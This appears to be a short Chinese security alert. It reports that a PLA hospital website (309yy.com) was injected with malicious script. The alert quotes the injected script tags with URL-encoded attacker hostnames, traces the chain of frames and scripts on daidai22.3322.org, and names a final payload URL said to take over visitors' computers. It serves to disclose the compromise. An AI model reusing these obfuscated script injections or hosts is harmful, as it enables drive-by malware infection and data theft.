解放军总医院第二附属医院被植入恶意代码
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.309yy.com/
网页被嵌入恶意链接代码:
<script src=http://%77%76%67%30%2E%63%6E></script>
<script src=http://%77%76%67%39%2E%63%6E></script>
<script src=”http://%33%38%7A%75%2E%63%6E”>
挂马分析:
[wide]http://www.309yy.com/
[script]http://%33%38%7a%75%2e%63%6e
[script]http://%77%76%67%30%2e%63%6e
[frame]http://daidai22.3322.org/a/a7.htm
[frame]http://daidai22.3322.org/a/cnzz.htm
[frame]http://daidai22.3322.org/a/kk.htm
[frame]http://daidai22.3322.org/a/flash.htm
[frame]http://daidai22.3322.org/a/xx.htm
[frame]http://daidai22.3322.org/a/office.htm
[frame]http://daidai22.3322.org/a/02.htm
[script]http://daidai22.3322.org/a/reee.js
[script]http://daidai22.3322.org/a/rkkk.js
[script]http://js.tongji.cn.yahoo.com/1081870/ystat.js
[script]http://s23.cnzz.com/stat.php?id=1408290&web_id=1408290
[script]http://%77%76%67%39%2e%63%6e
最终下载病毒文件:
http://xin89221.com/love/windoss.css
通过执行以上病毒文件,来达到完全控制访问者的系统。
关键字:恶意代码
